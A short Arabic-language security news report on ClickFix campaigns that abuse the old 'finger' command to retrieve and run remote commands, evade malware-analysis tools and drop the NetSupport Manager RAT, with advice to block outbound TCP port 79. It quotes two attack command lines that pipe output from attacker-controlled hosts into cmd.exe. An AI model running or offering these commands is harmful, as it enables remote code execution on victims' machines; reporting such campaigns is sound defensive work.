قام الفاعلون التهديديون بإعادة استخدام الأمر “finger” القديم الذي يعود لعقود مضت لتمكين تنفيذ الأوامر عن بُعد في هجمات جديدة باستخدام برمجيات ClickFix الخبيثة. تم تحديد ملف دفعي يستغل الأمر “finger root@finger.nateams[.]com” لاسترجاع وتنفيذ الأوامر عبر cmd.exe. وكشفت التحقيقات الإضافية عن حملة ClickFix تستخدم الأمر “finger Kove2@api.metrics-strange.com | cmd”، وهو مشابه لحملة أخرى تم الإبلاغ عنها. كانت هذه الاختراقات أكثر تعقيدًا، مستهدفة أدوات تحليل البرمجيات الخبيثة مثل WinDump، filemon، Procmon، x64dbg، vmmap، processlasso، Fiddler، وEverywhere. في حال عدم العثور على أدوات تحليل البرمجيات الخبيثة، يتم تحميل أرشيف ZIP يزعم أنه ملف PDF، ليقوم باستخراج حزمة NetSupport Manager RAT. وللتصدي لهذا الاستغلال، من الضروري حظر حركة المرور الصادرة إلى منفذ TCP رقم 79.
هل يُعيد المهاجمون استخدام أمر “finger” لشن هجمات ClickFix جديدة؟
